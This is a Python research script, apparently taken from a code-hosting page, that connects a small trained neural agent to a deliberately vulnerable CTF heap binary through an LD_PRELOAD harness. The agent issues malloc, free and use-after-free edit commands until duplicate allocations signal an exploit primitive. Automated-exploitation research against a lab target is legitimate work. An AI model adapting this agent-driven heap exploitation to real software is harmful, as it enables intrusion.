File size: 10,807 Bytes
22374d1
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
#!/usr/bin/env python3
"""
real_binary_bridge.py - Connect TRM agent to a real binary via LD_PRELOAD harness.

Architecture:
  1. Launch vuln_heap binary with heapgrid_harness.so (LD_PRELOAD)
  2. Agent reads heap state from harness dump file after each command
  3. Agent predicts next operation type via TRM
  4. Translates to menu commands and sends via stdin pipe
  5. Repeats until exploit primitive detected or max steps

This is the simulator-to-reality transfer test.
"""

import subprocess
import os
import sys
import json
import time
import random
import tempfile
import numpy as np
import torch
import torch.nn.functional as F
from pathlib import Path

ROOT = Path(__file__).resolve().parent.parent
sys.path.insert(0, str(ROOT / "agent"))
sys.path.insert(0, str(ROOT / "simulator"))
sys.path.insert(0, str(ROOT / "model"))
sys.path.insert(0, str(ROOT / "dataset"))

from simple_agent import SimpleHeapTRM, OP_MALLOC, OP_FREE, OP_WRITE_FREED, SIZES
from dataset_gen import state_to_grid, load_dump

BINARY = ROOT / "ctf" / "vuln_heap"
HARNESS = ROOT / "harness" / "heapgrid_harness.so"


class RealBinaryEnv:
    """Drives a real binary with the heap harness, providing grid observations."""

    def __init__(self, binary=BINARY, harness=HARNESS):
        self.binary = str(binary)
        self.harness = str(harness)
        self.proc = None
        self.dump_file = None
        self.slots = {}         # slot -> allocated (True/False)
        self.slot_sizes = {}    # slot -> size
        self.commands_sent = []
        self._last_dump_lines = 0

    def start(self):
        """Launch the binary with harness."""
        self.dump_file = tempfile.NamedTemporaryFile(
            suffix=".jsonl", delete=False, mode="w"
        )
        self.dump_path = self.dump_file.name
        self.dump_file.close()

        env = os.environ.copy()
        env["LD_PRELOAD"] = self.harness
        env["HEAPGRID_OUT"] = self.dump_path

        self.proc = subprocess.Popen(
            [self.binary],
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            env=env,
        )
        self.slots = {}
        self.slot_sizes = {}
        self.commands_sent = []
        self._last_dump_lines = 0

    def send_command(self, cmd: str):
        """Send a menu command to the binary."""
        self.proc.stdin.write((cmd + "\n").encode())
        self.proc.stdin.flush()
        self.commands_sent.append(cmd)
        time.sleep(0.01)  # let the binary process

    def do_malloc(self, slot: int, size: int):
        """Menu option 1: allocate note."""
        self.send_command(f"1 {slot} {size}")
        self.slots[slot] = True
        self.slot_sizes[slot] = size

    def do_free(self, slot: int):
        """Menu option 4: delete note."""
        self.send_command(f"4 {slot}")
        self.slots[slot] = False  # freed but pointer not cleared (UAF)

    def do_edit_uaf(self, slot: int, data_hex: str):
        """Menu option 2: edit note (works on freed chunks = UAF)."""
        self.send_command(f"2 {slot} {data_hex}")

    def do_show(self, slot: int):
        """Menu option 3: show note."""
        self.send_command(f"3 {slot}")

    def do_exit(self):
        """Menu option 5: exit."""
        self.send_command("5")

    def get_heap_state(self) -> dict:
        """Read the latest heap state from the dump file."""
        try:
            with open(self.dump_path, "r") as f:
                lines = f.readlines()
            if not lines:
                return None
            # Parse the last line
            last_line = lines[-1].strip()
            if last_line:
                return json.loads(last_line)
        except Exception:
            pass
        return None

    def get_grid(self) -> np.ndarray:
        """Get current heap state as a 32x16 grid."""
        state = self.get_heap_state()
        if state is None:
            return np.zeros((32, 16), dtype=np.int64)
        return state_to_grid(state)

    def get_all_states(self) -> list:
        """Read all heap states from dump."""
        try:
            return load_dump(Path(self.dump_path))
        except Exception:
            return []

    def check_duplicate_alloc(self) -> bool:
        """Check if any two slots point to the same address (from dump data)."""
        state = self.get_heap_state()
        if state is None:
            return False

        # Check if any two chunks have is_target or if show reveals same data
        # More reliable: check if the last malloc returned an address
        # that was already allocated to another slot
        chunks = state.get("chunks", [])
        addrs = []
        for c in chunks:
            if c.get("state") == 1:  # allocated
                addrs.append(c.get("addr"))
        # In the dump, allocated chunks sharing addresses = overlap
        return len(addrs) != len(set(addrs))

    def stop(self):
        """Clean up."""
        if self.proc:
            try:
                self.proc.stdin.close()
                self.proc.wait(timeout=2)
            except Exception:
                self.proc.kill()
        if self.dump_path and os.path.exists(self.dump_path):
            os.unlink(self.dump_path)


def run_agent_on_real_binary(
    model: SimpleHeapTRM,
    max_steps: int = 20,
    temperature: float = 0.3,
    verbose: bool = True,
) -> dict:
    """
    Run the TRM agent against the real vuln_heap binary.

    Returns dict with success info and the command sequence used.
    """
    env = RealBinaryEnv()
    env.start()

    # Give the binary a moment to initialize
    time.sleep(0.05)

    result = {
        "achieved": False,
        "steps": 0,
        "commands": [],
        "op_sequence": [],
    }

    model.eval()

    for step in range(max_steps):
        # Get heap state grid from real binary
        grid = env.get_grid()

        # TRM predicts operation type
        x = torch.from_numpy(grid).long().unsqueeze(0)
        with torch.no_grad():
            logits = model(x)
            if temperature == 0:
                op = logits.argmax(1).item()
            else:
                probs = F.softmax(logits / temperature, dim=1)
                op = torch.multinomial(probs, 1).item()

        # Translate operation to real binary commands
        success = False

        if op == OP_MALLOC:
            # Find a free slot
            free_slots = [s for s in range(16) if s not in env.slots or not env.slots.get(s)]
            if free_slots:
                slot = random.choice(free_slots[:8])
                size = random.choice(SIZES)
                env.do_malloc(slot, size)
                success = True
                if verbose:
                    print(f"  Step {step}: MALLOC slot={slot} size={hex(size)}")

        elif op == OP_FREE:
            # Find an allocated slot
            alloc_slots = [s for s, v in env.slots.items() if v]
            if alloc_slots:
                slot = random.choice(alloc_slots)
                env.do_free(slot)
                success = True
                if verbose:
                    print(f"  Step {step}: FREE slot={slot}")

        elif op == OP_WRITE_FREED:
            # Find a freed slot (UAF) and a target
            freed_slots = [s for s, v in env.slots.items() if not v]
            occupied = list(env.slots.keys())
            if freed_slots and len(occupied) >= 2:
                src = random.choice(freed_slots)
                targets = [s for s in occupied if s != src]
                if targets:
                    tgt = random.choice(targets)
                    # Write target's expected address as hex
                    # We don't know exact address, but we can write recognizable pattern
                    # For the UAF, write 8 bytes that would be interpreted as fd pointer
                    env.do_edit_uaf(src, "41" * 8)  # 0x4141414141414141
                    success = True
                    if verbose:
                        print(f"  Step {step}: WRITE_FREED slot={src} (UAF edit)")

        result["op_sequence"].append(["malloc", "free", "write_freed", "noop"][op])
        result["commands"] = env.commands_sent.copy()

        if not success:
            if verbose:
                print(f"  Step {step}: {['MALLOC','FREE','WRITE_FREED','NOOP'][op]} - skipped (no valid target)")
            continue

        time.sleep(0.02)  # let harness write

        # Check for exploit primitive
        if env.check_duplicate_alloc():
            result["achieved"] = True
            result["steps"] = step + 1
            if verbose:
                print(f"  ** EXPLOIT PRIMITIVE ACHIEVED at step {step + 1}! **")
            break

    env.do_exit()
    env.stop()

    if not result["achieved"]:
        result["steps"] = max_steps

    return result


def main():
    # Load trained model
    print("=== Loading trained model ===")
    model = SimpleHeapTRM(hidden_dim=128, n_outer=2, n_inner=3)

    # Train fresh (same as simple_agent.py)
    from simple_agent import generate_demos, train
    X, y = generate_demos(300)
    print(f"Training on {len(X)} demo samples...")
    train(model, X, y, epochs=100, lr=1e-3)

    # Test on real binary
    print("\n=== Testing on real vuln_heap binary ===")

    n_trials = 50
    n_achieved = 0
    all_steps = []

    for trial in range(n_trials):
        print(f"\n--- Trial {trial + 1}/{n_trials} ---")
        result = run_agent_on_real_binary(
            model, max_steps=20, temperature=0.3, verbose=True)

        if result["achieved"]:
            n_achieved += 1
            all_steps.append(result["steps"])
            print(f"  SUCCESS in {result['steps']} steps")
            print(f"  Op sequence: {' -> '.join(result['op_sequence'][:result['steps']])}")
        else:
            print(f"  FAILED after {result['steps']} steps")

    print(f"\n{'='*60}")
    print(f"REAL BINARY RESULTS")
    print(f"{'='*60}")
    print(f"Success rate: {n_achieved}/{n_trials} ({n_achieved/n_trials*100:.0f}%)")
    if all_steps:
        print(f"Avg steps when successful: {np.mean(all_steps):.1f}")
        print(f"Min steps: {min(all_steps)}, Max steps: {max(all_steps)}")

    # Best-of-10
    print(f"\n=== Best-of-10 evaluation (20 trials) ===")
    n_bo10 = 0
    for trial in range(20):
        found = False
        for attempt in range(10):
            result = run_agent_on_real_binary(
                model, max_steps=20, temperature=0.5, verbose=False)
            if result["achieved"]:
                found = True
                break
        if found:
            n_bo10 += 1
        print(f"  Trial {trial+1}: {'FOUND' if found else 'MISS'}")

    print(f"\nBest-of-10 success: {n_bo10}/20 ({n_bo10/20*100:.0f}%)")


if __name__ == "__main__":
    main()